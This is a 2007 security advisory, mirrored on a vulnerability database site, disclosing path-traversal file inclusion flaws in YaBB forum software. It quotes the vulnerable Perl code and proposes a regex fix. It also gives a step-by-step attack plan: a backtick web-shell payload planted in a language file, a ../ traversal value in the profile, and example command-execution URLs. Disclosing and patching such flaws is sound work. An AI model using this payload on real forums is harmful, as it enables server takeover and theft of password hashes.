Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

yabb-lfi.txt

🗓️ 20 Jun 2007 00:00:00Reported by kraszaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 241 Views

Local File Include Vulnerabilities in YaBB forum softwar

Code
`Local File Include Vulnerabilities  
  
Problem: Local File Include Vulnerabilities  
Product: YaBB <= 2.1(all version)  
Web page:http://www.yabbforum.com/  
  
Credit:Maciej `krasza` Kukla  
@mail:[email protected]  
homepage:www.krasza.int.pl  
  
1.Description  
  
"YaBB is a leading free forum software package that rivals any professional message board out there. It provides a real-time chat and support system for your visitors. While chat programs allow people to talk directly, you have to be on at the same time as others. With forum software like YaBB, you can talk any time, and everyone can join in the conversation! Build a community and get visitors to come back for interesting discussions, fun chit chat, or needed support without having to spend thousands of dollars."  
  
http://www.google.pl/search?q=Powered+by+YaBB => 1,640,000 clients  
  
2. Local File Include  
  
I found many bugs like it in this board.Bugs relate one special variable for user($language, you can edit this variable in your profile). Examples, where I found bugs:  
  
---Sources/HelpCentre.pl:139---  
if (-e ("$helpfile/$language/$help_area/$line.help")) {  
require "$helpfile/$language/$help_area/$line.help";  
}  
---end---  
  
---Sources/Subs.pl:1529---  
if (-e "$langdir/$use_lang/$what_to_load.lng") {  
require "$langdir/$use_lang/$what_to_load.lng";  
}  
---end---  
  
---Sources/ICQPager.pl:21---  
if ($language) { require "$langdir/$language/ICQ.lng"; }  
---end---  
  
---Sources/Post.pl:1838---  
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }  
---end---  
  
---Sources/Post.pl:1863---  
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }  
---end---  
  
---Sources/Post.pl:1880---  
if (-e "$langdir/$actlang/Notify.lng") { require "$langdir/$actlang/Notify.lng"; }  
---end---  
  
---Sources/InstantMessage.pl:1080---  
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/InstantMessage.lng"; }  
---end---  
  
---Sources/InstantMessage.pl:1082---  
if (-e "$langdir/$actlang/InstantMessage.lng") { require "$langdir/$actlang/Main.lng"; }  
---end---  
  
You can set this variable in profile's module.Thanks to uses the "../" characters, You can read other user's files(where is hash of password), exec other perl's script(so exec your code) etc.  
  
Example 'plan of attacking' page, where is YaBB's forum(exec your command on server):  
  
1.Find web, where is YaBB's forum(example 'http://victim.com/~krasza/yabb2/')  
2.Modify your local's folder 'English' (from YaBB's packet)  
English/HelpCentre.lng  
---  
%helptxt = (  
'1' => "Help Section",  
'2' => "Contents",  
---  
  
change for:  
  
---  
$content="<br><br><br><br><font color=red>";  
$content.=`$INFO{'cmd'}`;  
$content.="</font><br><br><br><br>";  
%helptxt = (  
'1' => "Help Section",  
'2' => $content,  
---  
  
3.Copy your local's folder 'folder' to your account on attack's server(victim.com)  
4.Create a new user(example 'attacker') on attack's forum(' http://vicitm.com/~krasza/yabb2/')  
5.Edit your profile and set 'userlangue' on "../../path/your/folder/where/is/English's/folder/"(I propose you use 'Tamper Data'-plugin for Firefox);  
6.Go to 'Help' on Yabb's page in your browser ('http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help');  
7.Now Thanks to 'cmd' var, You can exec your command, example:  
  
http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&cmd=whoami returns 'nobody'(red color) on top in left frame.  
http://vicitm.com/~krasza/yabb2/YaBB.pl?action=help&cmd=uname%20-a returns 'Linux thrall 2.4.31 #21 Sun Jun 5 19:19:51 PDT 2005 i686 unknown unknown GNU/Linux '  
etc.  
  
  
3.Exploits:  
  
If you much want to look exploit for this bug, I will can publish my code. I don't prefer publish my exploits. I think, that 'plan of attacking page' should suffice you.  
  
  
4.Fix:  
  
YaBB must filter language's var in profile's module.Until YaBB company will publish oficial fix, You should edit Sources/Profile.pl by this means:  
  
---Sources/Profile.pl:1225---  
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@/]+\Z^ && $member{'userlanguage'} ne "") { &fatal_error($profile_txt{'815'}); }  
---end---  
  
change for:  
  
---Sources/Profile.pl:1225---  
if ($member{'userlanguage'} !~ m^\A[0-9a-zA-Z_\.\#\%\-\:\+\?\$\&\~\.\,\@]+\Z^ && $member{'userlanguage'} ne "") { &fatal_error($profile_txt{'815'}); }  
---end---  
  
This version will deny injecting slash '/'.  
  
  
  
Maciej `krasza` Kukla  
[email protected]  
www.krasza.int.pl  
  
http://www.krewniacy.pl  
  
--   
Best regards, Maciej `krasza` Kukla   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
20 Jun 2007 00:00Current
7.4High risk
Vulners AI Score7.4
yabb forumlocal file includevulnerabilitiessecurityexploitsweb page
241